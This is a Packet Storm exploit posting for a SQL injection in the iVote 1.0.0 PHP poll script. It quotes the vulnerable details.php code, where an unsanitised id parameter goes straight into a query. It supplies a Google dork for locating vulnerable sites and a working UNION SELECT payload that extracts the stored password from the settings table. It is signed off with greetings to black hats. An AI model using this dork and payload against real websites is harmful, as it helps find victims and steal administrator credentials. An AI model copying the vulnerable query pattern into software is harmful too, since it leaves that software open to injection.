iVote 1.0.0 SQL Injection

2013-07-10T00:00:00
ID PACKETSTORM:122352
Type packetstorm
Reporter Ashiyane Digital Security Team
Modified 2013-07-10T00:00:00

Description

                                        
                                            `# Exploit Title: iVot Sql Injection  
# Google Dork: inurl:details.php?id=  
# Date: 2013 July 11  
# Exploit Author: Ashiyane Digital Security Team  
# Software Link:  
http://www.persianscript.ir/1391/09/25/ivote-poll-persian-script-download/  
# Version: 1.0.0  
# Tested on: Linux CentOS , Linux Ubunto , Windows 8  
  
vulnerability : details.php on line 5  
  
$id = $_GET['id'];  
  
$selectc = mysql_query("SELECT * FROM comments WHERE id = $id");  
  
$select = mysql_query("SELECT * FROM votes WHERE V_Id = $id");  
  
$row = mysql_fetch_array($select);  
  
///////////////////////////////////////  
  
Example : http://example.com/iVote/details.php?id=1 union select  
1,password,3,4 from settings  
  
  
///////////////////////  
TNX : Rz04 & Crypt0  
I Love Iran & all IRanian Black Hats :X  
  
I'm , Bi Edea (R3za)  
Email : momtane666@yahoo.com  
Gmail : kafaran.blackhats@Gmail.com  
`